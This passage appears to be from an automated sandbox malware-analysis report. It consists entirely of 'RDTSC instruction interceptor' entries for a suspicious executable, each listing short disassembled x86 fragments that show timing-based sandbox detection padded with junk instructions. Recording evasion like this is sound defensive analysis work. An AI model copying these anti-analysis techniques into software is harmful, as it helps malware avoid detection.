Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 65FCBD second address: 65FCC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 65FE1B second address: 65FE41 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB4390A66B6h 0x00000008 jmp 00007FB4390A66C9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 65FF96 second address: 65FFC6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FB438C61F28h 0x0000000c pushad 0x0000000d popad 0x0000000e jns 00007FB438C61F32h 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 popad 0x00000019 pushad 0x0000001a push esi 0x0000001b push edi 0x0000001c pop edi 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 65FFC6 second address: 65FFCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 65FFCA second address: 65FFEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F37h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 6602B7 second address: 6602BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 6586A6 second address: 6586AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 63950D second address: 639512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 660B83 second address: 660B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C61F31h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 660B9A second address: 660B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 660B9E second address: 660BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F38h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 660E71 second address: 660E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 6610F2 second address: 661110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FB438C61F35h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 665414 second address: 66541A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66541A second address: 66541E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66541E second address: 665422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 667D5B second address: 667D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jno 00007FB438C61F26h 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 667D6A second address: 667D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 667D70 second address: 667D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66ACEA second address: 66ACEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 62C0A4 second address: 62C0C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F2Eh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jc 00007FB438C61F26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66F6D6 second address: 66F700 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB4390A66C7h 0x00000008 jmp 00007FB4390A66C1h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB4390A66BFh 0x00000014 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66F700 second address: 66F71E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB438C61F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jne 00007FB438C61F2Eh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66F71E second address: 66F724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66F724 second address: 66F743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FB438C61F33h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66EB12 second address: 66EB2F instructions: 0x00000000 rdtsc 0x00000002 je 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB4390A66C3h 0x0000000f rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66ECD9 second address: 66ECDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66ECDF second address: 66ECE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66ECE3 second address: 66ECE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66EE49 second address: 66EE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66EE4F second address: 66EE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007FB438C61F28h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB438C61F30h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66EE73 second address: 66EE93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB4390A66C7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66EE93 second address: 66EE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66F263 second address: 66F26B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 66F26B second address: 66F275 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB438C61F26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 670A48 second address: 670A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 670D67 second address: 670D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 670F2F second address: 670F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 670F33 second address: 670F41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FB438C61F26h 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 671113 second address: 67111C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 671A88 second address: 671A92 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB438C61F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 671A92 second address: 671AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4390A66C0h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 671B82 second address: 671B86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 671B86 second address: 671B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FB4390A66B6h 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 671D0A second address: 671D10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 671D10 second address: 671D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FB4390A66B6h 0x00000009 jp 00007FB4390A66B6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jnc 00007FB4390A66C0h 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007FB4390A66B8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 ja 00007FB4390A66BCh 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 671D68 second address: 671D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 671D79 second address: 671D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4390A66C4h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 671D91 second address: 671DA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 671DA9 second address: 671DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 671DAE second address: 671DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 672C2C second address: 672C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 672C32 second address: 672C90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jns 00007FB438C61F32h 0x0000000d nop 0x0000000e sub esi, dword ptr [ebp+122D1E20h] 0x00000014 push 00000000h 0x00000016 jo 00007FB438C61F28h 0x0000001c mov edi, ebx 0x0000001e push 00000000h 0x00000020 call 00007FB438C61F33h 0x00000025 call 00007FB438C61F2Dh 0x0000002a sub dword ptr [ebp+122D3C0Fh], ebx 0x00000030 pop edi 0x00000031 pop esi 0x00000032 push eax 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 jnl 00007FB438C61F26h 0x0000003c rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 673C23 second address: 673C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 673C27 second address: 673C98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FB438C61F28h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov esi, dword ptr [ebp+122D2BCDh] 0x00000030 mov di, cx 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+12474824h], eax 0x0000003b push 00000000h 0x0000003d mov edi, dword ptr [ebp+122D2C15h] 0x00000043 movsx esi, cx 0x00000046 xchg eax, ebx 0x00000047 jmp 00007FB438C61F35h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jnp 00007FB438C61F28h 0x00000055 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 6746EB second address: 6746EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 675C14 second address: 675C5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB438C61F35h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB438C61F33h 0x00000018 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 6772AF second address: 6772B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 6772B5 second address: 6772BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 6772BE second address: 6772C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 6772C2 second address: 6772E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+12446128h], ecx 0x0000000e push 00000000h 0x00000010 and si, 647Ah 0x00000015 push 00000000h 0x00000017 mov esi, dword ptr [ebp+122D1CA6h] 0x0000001d push eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 6733B3 second address: 6733C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 67BD19 second address: 67BD1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 636021 second address: 636035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4390A66BAh 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 636035 second address: 636039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 636039 second address: 636043 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 636043 second address: 636053 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FB438C61F2Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 67CD87 second address: 67CD8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 67CD8B second address: 67CD91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 67CD91 second address: 67CD97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 67DC94 second address: 67DCA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C61F31h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 67DCA9 second address: 67DCBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FB4390A66B6h 0x00000013 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 67DCBC second address: 67DCC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 67DCC2 second address: 67DD2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ebx, dword ptr [ebp+122D2BC9h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FB4390A66B8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov dword ptr [ebp+124457C6h], edx 0x00000032 and di, 1587h 0x00000037 push edi 0x00000038 cld 0x00000039 pop ebx 0x0000003a push 00000000h 0x0000003c mov di, 833Bh 0x00000040 xchg eax, esi 0x00000041 jp 00007FB4390A66C0h 0x00000047 pushad 0x00000048 jns 00007FB4390A66B6h 0x0000004e push ebx 0x0000004f pop ebx 0x00000050 popad 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 pushad 0x00000056 popad 0x00000057 pop eax 0x00000058 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 67FE18 second address: 67FE31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C61F35h 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 67FE31 second address: 67FE35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 680D12 second address: 680D2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 680D2A second address: 680D70 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB4390A66B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b movzx ebx, di 0x0000000e push 00000000h 0x00000010 mov edi, esi 0x00000012 push 00000000h 0x00000014 and edi, 654BF79Dh 0x0000001a push eax 0x0000001b pushad 0x0000001c push ecx 0x0000001d jmp 00007FB4390A66BCh 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FB4390A66C8h 0x0000002a rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 681E28 second address: 681E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 681E2D second address: 681E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 681E33 second address: 681E63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB438C61F2Eh 0x00000013 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 681E63 second address: 681ED8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a call 00007FB4390A66C3h 0x0000000f mov edi, dword ptr [ebp+122D1F39h] 0x00000015 pop edi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007FB4390A66B8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov bl, B8h 0x00000036 jmp 00007FB4390A66C4h 0x0000003b push eax 0x0000003c jc 00007FB4390A66C4h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 682F0D second address: 682F12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 682F12 second address: 682F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB4390A66B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FB4390A66B8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 and bx, 64D5h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FB4390A66B8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 00000015h 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 jp 00007FB4390A66B9h 0x0000004f mov di, ax 0x00000052 push 00000000h 0x00000054 jnc 00007FB4390A66C6h 0x0000005a xchg eax, esi 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FB4390A66C4h 0x00000062 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 682F9B second address: 682FA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
